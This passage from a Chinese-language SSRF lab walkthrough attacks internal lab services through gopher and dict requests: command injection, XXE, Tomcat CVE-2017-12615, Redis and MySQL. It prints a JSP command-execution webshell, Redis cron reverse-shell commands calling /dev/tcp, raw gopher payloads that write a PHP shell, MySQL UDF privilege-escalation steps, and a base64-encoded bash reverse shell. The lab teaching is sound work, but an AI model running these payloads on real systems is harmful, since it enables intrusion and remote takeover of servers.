SQL 语句来写 shell: 175 | 176 | ![img](图片/16159486112615.png) 177 | 178 | 写入 shell 成功后尝试直接来命令执行: 179 | 180 | ![img](图片/16159487947826.png) 181 | 182 | ![img](图片/16159488236844.png) 183 | 184 | # 172.72.23.24 - 命令执行 185 | 186 | ## 命令执行应用详情 187 | 188 | 本版块属于上帝视角,主要作用是给读者朋友们展示一下应用本身正常的功能点情况,这样后面直接使用 SSRF 来攻击的话,思路就会更加清晰明了。 189 | 190 | 172.72.23.24 是一个经典的命令执行,通过 POST 方式攻击者可以随意利用 Linux 命令拼接符 ip 参数,从而导致任意命令执行: 191 | 192 | ![img](图片/16159595617894.png) 193 | 194 | ## SSRF 之命令执行 195 | 196 | 这种场景和之前的攻击场景稍微不太一样,之前的代码注入和 SQL 注入都是直接通过 GET 方式来传递参数进行攻击的,但是这个命令执行的场景是通过 POST 方式触发的,我们无法使用使用 SSRF 漏洞通过 HTTP 协议来传递 POST 数据,这种情况下一般就得利用 gopher 协议来发起对内网应用的 POST 请求了,gopher 的基本请求格式如下: 197 | 198 | ![img](图片/16159601558925.png) 199 | 200 | 201 | 202 | gopher 协议是一个古老且强大的协议,从请求格式可以看出来,可以传递最底层的 TCP 数据流,因为 HTTP 协议也是属于 TCP 数据层的,所以通过 gopher 协议传递 HTTP 的 POST 请求也是轻而易举的。 203 | 204 | 首先来抓取正常情况下 POST 请求的数据包,删除掉 HTTP 请求的这一行: 205 | 206 | ```payload 207 | Accept-Encoding: gzip, deflate 208 | ``` 209 | 210 | > 如果不删除的话,打出的 SSRF 请求会乱码,因为被两次 gzip 编码了。 211 | 212 | 接着在 Burpsuite 中将本 POST 数据包进行两次 URL 编码: 213 | 214 | ![img](图片/16159620724415.png) 215 | 216 | 两次 URL 编码后的数据就最终的 TCP 数据流,最终 SSRF 完整的攻击请求的 POST 数据包如下: 217 | 218 | ![img](图片/16159622165771.png) 219 | 220 | 可以看到通过 SSRF 成功攻击了 172.72.23.24 的命令执行 Web 应用,顺利执行了 `cat /etc/hosts` 的命令: 221 | 222 | ![img](图片/16159623108967.png) 223 | 224 | # 172.72.23.25 - XML 实体注入 225 | 226 | ## XXE 应用详情 227 | 228 | 本版块属于上帝视角,主要作用是给读者朋友们展示一下应用本身正常的功能点情况,这样后面直接使用 SSRF 来攻击的话,思路就会更加清晰明了。 229 | 230 | 本场景是一个基础的 XXE 外部实体注入场景,登录的时候用户提交的 XML 数据,且服务器后端对 XML 数据解析并将结果输出,所以可以构造一个 XXE 读取本地的敏感信息: 231 | 232 | ![img](图片/161596409182.png) 233 | 234 | 下面是 XXE 攻击的效果图: 235 | 236 | ![img](图片/16159641814811.png) 237 | 238 | ## SSRF 之 XXE 239 | 240 | 和上一个场景 172.72.23.24 的命令执行类似,这里 XXE 也是通过在 POST 数据包里面构造 Payload 来进行攻击的,所以依然先来抓取正常情况下 XXE 攻击的 POST 请求的数据包,删除掉 `Accept-Encoding` 这一行,然后使用 Burpsuite 对 POST 数据包进行两次 URL 编码: 241 | 242 | ![img](图片/1615964526544.png) 243 | 244 | 两次 URL 编码后的数据就最终的 TCP 数据流,最终 SSRF 完整的攻击请求的 POST 数据包如下: 245 | 246 | ![img](图片/16159645952337.png) 247 | 248 | 可以看到通过 SSRF 成功攻击了 172.72.23.25 的 XXE Web 应用,顺利执行了 `cat /etc/hosts` 的命令: 249 | 250 | ![img](图片/16159647944294.png) 251 | 252 | # 172.72.23.26 - CVE-2017-12615 253 | 254 | ## Tomcat 应用详情 255 | 256 | 本场景是一个 Tomcat 中间件,存在 CVE-2017-12615 任意写文件漏洞,这在 Tomcat 漏洞历史中也是比较经典第一个,国光这里不再赘述,没有复现的同学可以参考 vulhub 的靶场来复现次漏洞:[Tomcat PUT方法任意写文件漏洞(CVE-2017-12615)](https://github.com/vulhub/vulhub/blob/master/tomcat/CVE-2017-12615/README.zh-cn.md) 257 | 258 | ## SSRF 之 CVE-2017-12615 259 | 260 | 和之前的场景类似,国光这里不再赘述了,所以这部分写的比较简略一些。准备一个 JSP 一句话: 261 | 262 | ```java 263 | <% 264 | String command = request.getParameter("cmd"); 265 | if(command != null) 266 | { 267 | java.io.InputStream in=Runtime.getRuntime().exec(command).getInputStream(); 268 | int a = -1; 269 | byte[] b = new byte[2048]; 270 | out.print("
");
271 |         while((a=in.read(b))!=-1)
272 |         {
273 |             out.println(new String(b));
274 |         }
275 |         out.print("
"); 276 | } else { 277 | out.print("format: xxx.jsp?cmd=Command"); 278 | } 279 | %> 280 | ``` 281 | 282 | 将原本攻击的 POST 数据包: 283 | 284 | ![img](图片/16159678892175.png) 285 | 286 | 个 POST 请求二次 URL 编码,最后通过 SSRF 发起这个 POST 请求,返回 201 状态码表示成功写 shell: 287 | 288 | ![img](图片/16159680654495.png) 289 | 290 | 接着通过 SSRF 发起对 shell.jsp 的 HTTP 请求,成功执行了 `cat /etc/hosts` 的命令: 291 | 292 | ![img](图片/16159683314157.png) 293 | 294 | # 172.72.23.27 - Redis 未授权 295 | 296 | ## Redis unauth 应用详情 297 | 298 | 内网的 172.72.23.27 主机上的 6379 端口运行着未授权的 Redis 服务,系统没有 Web 服务(无法写 Shell),无 SSH 公私钥认证(无法写公钥),所以这里攻击思路只能是使用定时任务来进行攻击了。常规的攻击思路的主要命令如下: 299 | 300 | ```bash 301 | # 清空 key 302 | flushall 303 | 304 | # 设置要操作的路径为定时任务目录 305 | config set dir /var/spool/cron/ 306 | 307 | # 设置定时任务角色为 root 308 | config set dbfilename root 309 | 310 | # 设置定时任务内容 311 | set x "\n* * * * * /bin/bash -i >& /dev/tcp/x.x.x.x/2333 0>&1\n" 312 | 313 | # 保存操作 314 | save 315 | ``` 316 | 317 | ## SSRF 之 Redis unauth 318 | 319 | SSRF 攻击的话并不能使用 redis-cli 来连接 Redis 进行攻击操作,未授权的情况下可以使用 dict 或者 gopher 协议来进行攻击,因为 gopher 协议构造比较繁琐,所以本场景建议直接使用 DICT 协议来攻击,效率会高很多,DICT 协议除了可以探测端口以外,另一个奇技淫巧就是攻击未授权的 Redis 服务,格式如下: 320 | 321 | ```bash 322 | dict://x.x.x.x:6379/ 323 | ``` 324 | 325 | ![img](图片/16159716703465.png) 326 | 327 | 通过 SSRF 直接发起 DICT 请求,可以成功看到 Redis 返回执行完 info 命令后的结果信息,下面开始直接使用 dict 协议来创建定时任务来反弹 Shell 328 | 329 | ```bash 330 | # 清空 key 331 | dict://172.72.23.27:6379/flushall 332 | 333 | # 设置要操作的路径为定时任务目录 334 | dict://172.72.23.27:6379/config set dir /var/spool/cron/ 335 | 336 | # 在定时任务目录下创建 root 的定时任务文件 337 | dict://172.72.23.27:6379/config set dbfilename root 338 | 339 | # 写入 Bash 反弹 shell 的 payload 340 | dict://172.72.23.27:6379/set x "\n* * * * * /bin/bash -i >%26 /dev/tcp/x.x.x.x/2333 0>%261\n" 341 | 342 | # 保存上述操作 343 | dict://172.72.23.27:6379/save 344 | ``` 345 | 346 | > SSRF 传递的时候记得要把 `&` URL 编码为 `%26`,上面的操作最好再 BP 下抓包操作,防止浏览器传输的时候被 URL 打乱编码 347 | 348 | ![img](图片/16205798556776.png) 349 | 350 | 在目标系统上创建定时任务后,shell 也弹了出来,查看下 `cat /etc/hosts` 的确是 172.72.23.27 这台内网机器: 351 | 352 | ![img](图片/1620373632443.png) 353 | 354 | # 172.72.23.28 - Redis 有认证 355 | 356 | ## Redis auth 应用详情 357 | 358 | 本版块属于上帝视角,主要作用是给读者朋友们展示一下应用本身正常的功能点情况,这样后面直接使用 SSRF 来攻击的话,思路就会更加清晰明了。 359 | 360 | 该 172.72.23.28 主机运行着 Redis 服务,但是有密码验证,无法直接未授权执行命令: 361 | 362 | ![img](图片/16203786039801.png) 363 | 364 | 不过除了 6379 端口还开放了 80 端口,是一个经典的 LFI 本地文件包含,可以利用此来读取本地的文件内容: 365 | 366 | ![img](图片/16203790367605.png) 367 | 368 | 因为 Redis 密码记录在 redis.conf 配置文件中,结合这个文件包含漏洞点,那么这时来尝试借助文件包含漏洞来读取 redis 的配置文件信息,Redis 常见的配置文件路径如下: 369 | 370 | ```payload 371 | /etc/redis.conf 372 | /etc/redis/redis.conf 373 | /usr/local/redis/etc/redis.conf 374 | /opt/redis/ect/redis.conf 375 | ``` 376 | 377 | 成功读取到 `/etc/redis.conf` 配置文件,直接搜索 `requirepass`关键词来定位寻找密码: 378 | 379 | ![img](图片/1620379158609.png) 380 | 381 | 拿到密码的话就可以正常和 Redis 进行交互了: 382 | 383 | ![img](图片/16203793021008.png) 384 | 385 | ## SSRF 之 Redis auth 386 | 387 | 首先借助目标系统的 80 端口上的文件包含拿到 Redis 的密码:P@ssw0rd 388 | 389 | ![img](图片/16203795678307.png) 390 | 391 | 有密码的话先使用 dict 协议进行密码认证看看: 392 | 393 | ![img](图片/16203796537306.png) 394 | 395 | 但是因为 dict 不支持多行命令的原因,这样就导致认证后的参数无法执行,所以 dict 协议理论上来说是没发攻击带认证的 Redis 服务的。 396 | 397 | 那么只能使用我们的老伙计 gopher 协议了,gopher 协议因为需要原生数据包,所以我们需要抓取到 Redis 的请求数据包。可以使用 Linux 自带的 socat 命令来进行本地的模拟抓取: 398 | 399 | 命令来进行本地的模拟抓取: 400 | 401 | ```bash 402 | socat -v tcp-listen:4444,fork tcp-connect:127.0.0.1:6379 403 | ``` 404 | 405 | 此时使用 redis-cli 连接本地的 4444 端口: 406 | 407 | ```bash 408 | ➜ ~ redis-cli -h 127.0.0.1 -p 4444 409 | 127.0.0.1:4444> 410 | ``` 411 | 412 | 服务器接着会把 4444 端口的流量接受并转发给服务器的 6379 端口,然后认证后进行往网站目录下写入 shell 的操作: 413 | 414 | ```bash 415 | # 认证 redis 416 | 127.0.0.1:4444> auth P@ssw0rd 417 | OK 418 | 419 | # 清空 key 420 | 127.0.0.1:4444> flushall 421 | 422 | # 设置要操作的路径为网站根目录 423 | 127.0.0.1:4444> config set dir /var/www/html 424 | 425 | # 在网站目录下创建 shell.php 文件 426 | 127.0.0.1:4444> config set dbfilename shell.php 427 | 428 | # 设置 shell.php 的内容 429 | 127.0.0.1:4444> set x "\n\n" 430 | 431 | # 保存上述操作 432 | 127.0.0.1:4444> save 433 | ``` 434 | 435 | 与此同时我们还可以看到详细的数据包情况,下面来记录一下关键的流量情况: 436 | 437 | ![img](图片/16203835195059.png) 438 | 439 | 可以看到 Redis 的流量并不难理解,可以根据上图橙色标记的注释来理解一下,接下来整理出关键的请求数据包如下: 440 | 441 | ```payload 442 | *2\r 443 | $4\r 444 | auth\r 445 | $8\r 446 | P@ssw0rd\r 447 | *1\r 448 | $8\r 449 | flushall\r 450 | *4\r 451 | $6\r 452 | config\r 453 | $3\r 454 | set\r 455 | $3\r 456 | dir\r 457 | $13\r 458 | /var/www/html\r 459 | *4\r 460 | $6\r 461 | config\r 462 | $3\r 463 | set\r 464 | $10\r 465 | dbfilename\r 466 | $9\r 467 | shell.php\r 468 | *3\r 469 | $3\r 470 | set\r 471 | $1\r 472 | x\r 473 | $25\r 474 | 475 | 476 | \r 477 | *1\r 478 | $4\r 479 | save\r 480 | ``` 481 | 482 | 可以看到每行都是以`\r`结尾的,但是 Redis 的协议是以 CRLF (`\r\n`)结尾,所以转换的时候需要把`\r`转换为`\r\n`,然后其他全部进行 两次 URL 编码,这里借助 BP 就很容易解决: 483 | 484 | ![img](图片/16203839384264.png) 485 | 486 | 最后放到 SSRF 的漏洞点进行请求: 487 | 488 | ![img](图片/16203841323189.png) 489 | 490 | 执行成功的话会在 /var/www/html 根目录下写入 shell.php 文件,密码为 1,那么下面借助 SSRF 漏洞来试试看: 491 | 492 | ```payload 493 | http://172.23.23.28/shell.php?1=phpinfo(); 494 | ``` 495 | 496 | ![img](图片/16203841954734.png) 497 | 498 | 499 | 500 | 成功 getshell,那么消化吸收一下,下面尝试使用 SSRF 来攻击 MySQL 服务吧。 501 | 502 | # 172.72.23.29 - MySQL 未授权 503 | 504 | ## MySQL 应用详情 505 | 506 | MySQL 空密码可以登录,靶场在数据库下和系统下各放了一个 flag,通过 SSRF 可以和数据库进行交互,SSRF 进行 UDF 提权可以拿到系统下的 flag: 507 | 508 | ![img](图片/16204652496250.png) 509 | 510 | ## SSRF 之 MySQL 未授权 511 | 512 | ### 获取原始数据包 513 | 514 | MySQL 需要密码认证时,服务器先发送 salt 然后客户端使用 salt 加密密码然后验证;但是当无需密码认证时直接发送 TCP/IP 数据包即可。所以这种情况下是可以直接利用 SSRF 漏洞攻击 MySQL 的。因为使用 gopher 协议进行攻击需要原始的 MySQL 请求的 TCP 数据包,所以还是和攻击 Redis 应用一样,这里我们使用 tcpdump 来监听抓取 3306 的认证的原始数据包: 515 | 516 | ```bash 517 | # lo 回环接口网卡 -w 报错 pcapng 数据包 518 | tcpdump -i lo port 3306 -w mysql.pcapng 519 | ``` 520 | 521 | 然后本地使用 MySQL 来执行一些测试命令: 522 | 523 | ```mysql 524 | $ mysql -h127.0.0.1 -uroot -e "select * from flag.test union select user(),'www.sqlsec.com';" 525 | +----------------+----------------------------------------+ 526 | | id | flag | 527 | +----------------+----------------------------------------+ 528 | | 1 | flag{71***************************316} | 529 | | root@127.0.0.1 | www.sqlsec.com | 530 | +----------------+----------------------------------------+ 531 | ``` 532 | 533 | 中止 tcpdump 使用 Wireshark 打开 `mysql.pcapng` 数据包,追踪 TCP 流 然后过滤出发给 3306 的数据: 534 | 535 | ![img](图片/16204668042945.png) 536 | 537 | 保存为原始数据「Show data as `Raw`」,并且整理成 1 行: 538 | 539 | ```payload 540 | a100000185a23f0000000001080000000000000000000000000000000000000000000000726f6f7400006d7973716c5f6e61746976655f70617373776f72640064035f6f73054c696e75780c5f636c69656e745f6e616d65086c69626d7973716c045f706964033530380f5f636c69656e745f76657273696f6e06352e362e3531095f706c6174666f726d067838365f36340c70726f6772616d5f6e616d65056d7973716c210000000373656c65637420404076657273696f6e5f636f6d6d656e74206c696d697420313d0000000373656c656374202a2066726f6d20666c61672e7465737420756e696f6e2073656c656374207573657228292c277777772e73716c7365632e636f6d270100000001 541 | ``` 542 | 543 | ### 生成 gopher 数据流 544 | 545 | 然后使用如下的 Python3 脚本将数据转化为 url 编码: 546 | 547 | ```python 548 | import sys 549 | 550 | def results(s): 551 | a=[s[i:i+2] for i in range(0,len(s),2)] 552 | return "curl gopher://127.0.0.1:3306/_%"+"%".join(a) 553 | 554 | if __name__=="__main__": 555 | s=sys.argv[1] 556 | print(results(s)) 557 | ``` 558 | 559 | 运行效果如下: 560 | 561 | ![img](图片/16204671626680.png) 562 | 563 | ### SSRF 之 查询数据库 564 | 565 | 本地 curl 请求这个 gopher 协议的数据包看看: 566 | 567 | ![img](图片/16204672777528.png) 568 | 569 | 从图上可以看到 gopher 请求的数据包已经成功执行了,user() 和 数据库中的 flag 都可查询出来了。 570 | 571 | 如果 curl 请求提示是一个二进制文件无法直接显示,所可以使用 `--output` 来输出到文件中,然后手动 cat 文件同样也可以看到gopher 协议交互 MySQL 的执行结果: 572 | 573 | ```bash 574 | $ curl gopher://127.0.0.1:3306/_xxx --output mysql_result 575 | ``` 576 | 577 | ### SSRF 之 MySQL 提权 578 | 579 | SSRF 攻击 MySQL 仅仅查询数据意义不大,不如直接 UDF 提权然后反弹 shell 出来更加直接,下面尝试使用 SSRF 来 UDF 提权内网的 MySQL 应用,关于 MySQL 更详细的文章可以参考我之前MySQL 漏洞利用与提权 [MySQL 漏洞利用与提权](https://www.sqlsec.com/2020/11/mysql.html) 。 580 | 581 | 首先来寻找 MySQL 的插件目录,原生的 MySQL 命令如下: 582 | 583 | ```bash 584 | $ mysql -h127.0.0.1 -uroot -e "show variables like 585 | '%plugin%';" 586 | ``` 587 | 588 | tcpdump 监听,使用 Wirshark 分析导出原始数据: 589 | 590 | ![img](图片/16204676811766.png) 591 | 592 | 使用脚本将原始数据转换 gopher 协议,得到的数据如下: 593 | 594 | ```bash 595 | curl gopher://127.0.0.1:3306/_%a2%00%00%01%85%a2%3f%00%00%00%00%01%08%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%65%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%04%33%35%35%34%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%36%2e%35%31%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%21%00%00%00%03%73%65%6c%65%63%74%20%40%40%76%65%72%73%69%6f%6e%5f%63%6f%6d%6d%65%6e%74%20%6c%69%6d%69%74%20%31%20%00%00%00%03%73%68%6f%77%20%76%61%72%69%61%62%6c%65%73%20%6c%69%6b%65%20%0a%27%25%70%6c%75%67%69%6e%25%27%01%00%00%00%01 596 | ``` 597 | 598 | 放入到 BP 中请求的话记得需要二次 URL 编码,可以直接获取到插件的目录信息 : 599 | 600 | ![img](图片/16204679134706.png) 601 | 602 | 拿到 MySQL 的插件目录为:`/usr/lib/mysql/plugin/` 603 | 604 | 接着来写入动态链接库,原生的 MySQL 命令如下: 605 | 606 | ```bash 607 | # 因为 payload 太长 这里就先进入 MySQL 控制台 608 | $ mysql -h127.0.0.1 -uroot 609 | 610 | MariaDB [(none)]> SELECT 0x7f454c460...省略大量payload...0000000 INTO DUMPFILE '/usr/lib/mysql/plugin/udf.so'; 611 | ``` 612 | 613 | > 关于 UDF 提权的 UDF 命令可以参考国光写的这个 UDF 提权辅助页面:[MySQL UDF 提权十六进制查询 | 国光](https://www.sqlsec.com/tools/udf.html) 614 | 615 | tcpdump 监听到的原始数据后,转换 gopher 协议,SSRF 攻击写入动态链接库,因为这个 gopher 协议的数据包非常长,BP 这边可能会出现 Waiting 卡顿的状态: 616 | 617 | ![img](图片/16204695776705.png) 618 | 619 | 不过问题不大,实际上 udf.so 已经成功写入到 MySQL 的插件目录下了: 620 | 621 | ![img](图片/16204695857520.png) 622 | 623 | 以此类推,创建自定义函数: 624 | 625 | ```bash 626 | $ mysql -h127.0.0.1 -uroot -e "CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.so';" 627 | ``` 628 | 629 | 最后通过创建的自定义函数并执行系统命令将 shell 弹出来,原生命令如下: 630 | 631 | ```bash 632 | $ mysql -h127.0.0.1 -uroot -e "select sys_eval('echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4yMTEuNTUuMi8yMzMzIDA+JjE=|base64 -d|bash -i')" 633 | ``` 634 | 635 | 因为测试默认情况下弹不出来,所以这里将原始的 bash 反弹 shell 命令给编码了: 636 | 637 | ![img](图片/16204701072416.png) 638 | 639 | 这个编码实际上就是 JS Base64 一下,模仿国外的那个网站,安全小公举 | 国光](https://www.sqlsec.com/tools.html) 640 | 641 | tcpdump 监听到的原始数据后,转换 gopher 协议,BP 二次编码请求一下,然后 SSRF 攻击成功弹出 shell: 642 | 643 | ![img](图片/16204703947056.png) 644 | 645 | # 靶场源码 646 | 647 | 来源: 国光 648 | 文章链接: https://www.sqlsec.com/2021/05/ssrf.html 649 | 咳咳~ 又想白嫖文章?本文章著作权归作者所有,任何形式的转载都请注明出处。 --------------------------------------------------------------------------------